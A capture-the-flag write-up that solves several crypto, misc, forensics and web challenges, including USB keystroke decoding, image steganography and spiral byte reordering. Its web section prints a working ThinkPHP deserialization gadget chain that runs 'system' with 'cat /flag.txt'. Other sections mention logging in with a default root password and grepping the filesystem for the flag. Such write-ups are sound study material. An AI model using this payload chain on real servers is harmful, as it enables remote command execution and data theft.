Crypto
Sign in to the station
For the sign-in, send a message first to get the challenge text:
The 7 codes corresponding to "Bee Shi arrived safely":
1732 2514 1344 0356 0451 6671 0055
Modulo ten algorithm example: 1732 and 6378 get 7000
Example of sending a packet: /send?msg=s
Applying the modulo 10 operation to the codes and the codebook gives 2979481690868655519524457577
Then send the request.
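The modulo ten operation described above, as an added example that is not part of the original write-up. The function names and SAMPLE_CODEBOOK are constructed for illustration; the real codebook is not given on this page.

```python
# Added illustration: digit-wise modulo-10 arithmetic on four-digit telegraph codes.
PLAIN_CODES = "1732 2514 1344 0356 0451 6671 0055"       # from the challenge text
SAMPLE_CODEBOOK = "6378 1029 3847 5665 4738 2910 0192"   # constructed, NOT the real codebook


def _digits(text):
    """Strip spaces and check that only decimal digits remain."""
    digits = text.replace(" ", "")
    if not digits.isdigit():
        raise ValueError("codes must contain only digits and spaces")
    return digits


def _combine(a, b, sign):
    """Combine two digit strings column by column, modulo 10, with no carry or borrow."""
    a, b = _digits(a), _digits(b)
    if len(a) != len(b):
        raise ValueError("codes and codebook must have the same number of digits")
    return "".join(str((int(x) + sign * int(y)) % 10) for x, y in zip(a, b))


def mod10_add(codes, codebook):
    """Sender side: 1732 and 6378 give 7000, as in the challenge's own example."""
    return _combine(codes, codebook, +1)


def mod10_sub(message, codebook):
    """Receiver side: the inverse of mod10_add, recovering the original codes."""
    return _combine(message, codebook, -1)


def send_path(codes, codebook):
    """Build the request path in the /send?msg=... form shown by the challenge."""
    return "/send?msg=" + mod10_add(codes, codebook)


if __name__ == "__main__":
    print(send_path(PLAIN_CODES, SAMPLE_CODEBOOK))
```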
Two-way authentication based on challenge code1
Two-way authentication based on challenge code2
As in the last competition, there was an unintended solution; that one was also a Spring and Autumn game. Running grep -r "flag{" / directly finds the flag.
Two-way authentication based on challenge code3
The same method only produces a fake flag here.
I thought it was fixed
Half an hour? Another bunch of people
Did you put a web challenge in crypto this time? (?
The root password is toor (some virtual machines use this password); flag2.txt is then found in the same location as before.
Misc
ez_usb
There is obvious keyboard traffic, but exporting it directly gives the wrong result. The capture also shows two source addresses, 2.8.1 and 2.10.1, so the guess is that they need to be exported separately.
Export 2.8.1: tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 8" > 281.txt
Export 2.10.1: tshark -r ez_usb.pcapng -T fields -e usbhid.data -Y "usb.device_address == 10" > 2101.txt
Strangely, using usb.src directly does not work, and even in string form it cannot export 2.8.1 and 2.10.1.
Keyboard decoding script from the web:
import os

# os.system("tshark -r test.pcapng -T fields -e usb.capdata > usbdata.txt")
# HID usage ID -> character without Shift
normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
# HID usage ID -> character with Shift held (0x33 is ':' and 0x34 is '"')
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":","34":"\"","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
nums = []
with open('281.txt') as keys:
    for line in keys:
        if len(line) != 17:  # first filter out USB traffic from mice and other devices
            continue
        nums.append(line[0:2] + line[4:6])  # take the first and third bytes
output = ""
for n in nums:
    if n[2:4] == "00":
        continue
    if n[2:4] in normalKeys:
        if n[0:2] == "02":  # Shift is held down
            output += shiftKeys[n[2:4]]
        else:
            output += normalKeys[n[2:4]]
    else:
        output += '[unknown]'
print('output :\n' + output)
This gives a compressed archive (the c before the del and the last e need to be deleted) and a password, 35c535765e50074a; decompressing gives the flag.
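The same decoding as an added example, not part of the original write-up or the script it borrows. It goes beyond that script: it reads all six key slots of each 8-byte report, treats either Shift key as shift, emits only newly pressed keys, and applies backspace so the manual deletion step is not needed. The function names and the sample reports are constructed for illustration, and a US layout is assumed.

```python
# Added illustration (not the page's script): stateful HID boot-keyboard decoder.
SHIFT_MASK = 0x22   # modifier bit 1 = left Shift, bit 5 = right Shift
BACKSPACE = 0x2A    # the key the page's script prints as <DEL>


def build_keymaps():
    """Map HID usage IDs to characters for the plain and shifted layers (US layout)."""
    plain, shifted = {}, {}
    rows = [
        (0x04, "abcdefghijklmnopqrstuvwxyz1234567890", "ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()"),
        (0x2D, "-=[]\\", "_+{}|"),
        (0x33, ";'`,./", ":\"~<>?"),
    ]
    for start, low, high in rows:
        for offset, (a, b) in enumerate(zip(low, high)):
            plain[start + offset], shifted[start + offset] = a, b
    for usage, char in ((0x28, "\n"), (0x2B, "\t"), (0x2C, " ")):
        plain[usage] = shifted[usage] = char
    return plain, shifted


def decode_reports(lines):
    """Rebuild typed text from hex lines of 8-byte reports (tshark -e usbhid.data)."""
    plain, shifted = build_keymaps()
    typed, previous = [], set()
    for line in lines:
        hexdata = line.strip().replace(":", "")
        if len(hexdata) != 16:            # not a keyboard report (mouse, etc.)
            continue
        report = bytes.fromhex(hexdata)
        table = shifted if report[0] & SHIFT_MASK else plain
        current = {key for key in report[2:8] if key > 0x03}  # 0x01-0x03 are error codes
        for key in report[2:8]:
            if key not in current or key in previous:
                continue                  # empty slot, error code, or key still held
            if key == BACKSPACE:
                if typed:
                    typed.pop()           # apply the deletion instead of printing <DEL>
            elif key in table:
                typed.append(table[key])
        previous = current
    return "".join(typed)


# Constructed sample reports (not from ez_usb.pcapng): F, l, c, Backspace, a, g, !
SAMPLE = ["0200090000000000", "0000000000000000", "00000f0000000000", "0000000000000000",
          "0000060000000000", "00002a0000000000", "0000040000000000", "0000040a00000000",
          "0000000000000000", "20001e0000000000", "00010000"]

if __name__ == "__main__":
    print(decode_reports(SAMPLE))
```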
everlasting_night
The A2 channel contains a password.
The RGB 0 channels contain LSB data, but it cannot be extracted directly; since there is a password, the guess is cloacked-pixel, ichunqiu's favorite.
Using lsb.py, extract a compressed archive.
Also, at the end of the original PNG file there are 16 bytes of extra data. Brute-forcing it as XOR does not work; trying it as MD5 does (cmd5 can't even solve it).
5 languages
The extracted file is a PNG, but after zlib decompression it is all 00 followed by some data, and that data does not look like zlib or Huffman compression. Since a BMP header fits the data exactly, treat it as a BMP: use a QQ screenshot to generate a new BMP image, replace its data, change the bit depth to 24 and then brute-force the width.
The image comes out at a width of 352.
The brute-force script is an inherited one of more than 400 lines (it can brute-force many formats); only the BMP part is given below.
import os

def crackbmp(fr, n=2000, h=300):
    # fr: raw bytes of the BMP file; n: upper bound for the width; h: height to write.
    # In the full script these are globals; the defaults come from the commented hints below.
    bmph = fr[22:26]
    print(type(bmph))
    print(bmph)
    k = int.from_bytes(bmph, 'little', signed=True)
    print(k)
    if k < 0:
        headdata = bytearray(fr[0:18])
        widthdata = bytearray(fr[18:22])
        heightdata = bytearray(fr[22:26])
        remaindata = bytearray(fr[26::])
        # n = 2000
        h1 = -h
        # h = h & 0xffffffff
        print(h1)
        path = os.getcwd()
        tmppath = path + '\\tmpbmpnormal'
        print(tmppath)
        if os.path.exists(tmppath):
            os.chdir(tmppath)
        else:
            os.mkdir(tmppath)
            os.chdir(tmppath)
        heightdata = h1.to_bytes(4, 'little', signed=True)
        for w in range(1, n):
            widthdata = w.to_bytes(4, 'little')
            newfile = headdata + widthdata + heightdata + remaindata
            with open(str(w) + '.bmp', 'wb') as fw:  # one output file per candidate width
                fw.write(newfile)
    else:
        headdata = bytearray(fr[0:18])
        widthdata = bytearray(fr[18:22])
        heightdata = bytearray(fr[22:26])
        remaindata = bytearray(fr[26::])
        # n = 2000
        # h = 300
        path = os.getcwd()
        tmppath = path + '\\tmpbmpreverse'
        print(tmppath)
        if os.path.exists(tmppath):
            os.chdir(tmppath)
        else:
            os.mkdir(tmppath)
            os.chdir(tmppath)
        heightdata = h.to_bytes(4, 'little', signed=True)
        for w in range(1, n):
            widthdata = w.to_bytes(4, 'little')
            # print(widthdata)
            newfile = headdata + widthdata + heightdata + remaindata
            with open(str(w) + '.bmp', 'wb') as fw:  # one output file per candidate width
                fw.write(newfile)
Questionnaire
baby disk
First there is a WAV; after recovering the disk, a file can also be seen in the recycle bin. Testing shows that the WAV was made with DeepSound.
Get the password feedback, and then extract with DeepSound.
key:e575ac894c385a6f
Okay, next is the file without a name; Forensics Master was used for the forensics here.
Very good, it is an encrypted file. After testing, I found that it is VeraCrypt, and I got a zip, but it is very strange. I translated the name of the zip and found that it means "spiral".
Look at the byte size
Very good, I appreciate it
Find a Python algorithm online:
https://blog.csdn.net/GW_wg/article/details/120406192
def function(n):
    matrix = [[0] * n for _ in range(n)]
    number = 1
    left, right, up, down = 0, n - 1, 0, n - 1
    while left < right and up < down:
        # left to right
        for i in range(left, right):
            matrix[up][i] = number
            number += 1
        # top to bottom
        for i in range(up, down):
            matrix[i][right] = number
            number += 1
        # right to left
        for i in range(right, left, -1):
            matrix[down][i] = number
            number += 1
        # bottom to top
        for i in range(down, up, -1):
            matrix[i][left] = number
            number += 1
        left += 1
        right -= 1
        up += 1
        down -= 1
    # when n is odd, the single cell in the middle of the square must be filled separately
    if n % 2 != 0:
        matrix[n // 2][n // 2] = number
    return matrix
Very good, this outputs the spiral order; just call it and reassemble the bytes directly. The complete script is as follows:
def function(n):
    matrix = [[0] * n for _ in range(n)]
    number = 1
    left, right, up, down = 0, n - 1, 0, n - 1
    while left < right and up < down:
        # left to right
        for i in range(left, right):
            matrix[up][i] = number
            number += 1
        # top to bottom
        for i in range(up, down):
            matrix[i][right] = number
            number += 1
        # right to left
        for i in range(right, left, -1):
            matrix[down][i] = number
            number += 1
        # bottom to top
        for i in range(down, up, -1):
            matrix[i][left] = number
            number += 1
        left += 1
        right -= 1
        up += 1
        down -= 1
    # when n is odd, the single cell in the middle of the square must be filled separately
    if n % 2 != 0:
        matrix[n // 2][n // 2] = number
    return matrix

f = open('spiral.zip', 'rb').read()
s = function(87)
# print(s)
s = sum(s, [])  # flatten the 87 x 87 matrix row by row
# print(s)
arr = [0] * 7569
# print(arr)
for i in range(len(s)):
    arr[i] = f[s[i] - 1]  # byte number s[i] along the spiral goes to row-major position i
# print(arr)
with open('fla.zip', 'wb') as f1:
    f1.write(bytes(arr))  # save the reordered bytes
for i in arr:
    print(hex(i)[2:].zfill(2), end='')
Then convert the hex in Notepad++.
The length is 49, good, so apply the spiral again.
Very good, appreciate it ->flag{701fa9fe-63f5-410b-93d4-119f96965be6}
Web
Ezpop
Download the source code from www.zip; there is deserialization in the controller.
https://www.freebuf.com/vuls/321546.html
Constructing the chain:
<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}
namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
Then decode the base64 in CyberChef and URL-encode it; I didn't succeed with urlencode directly here...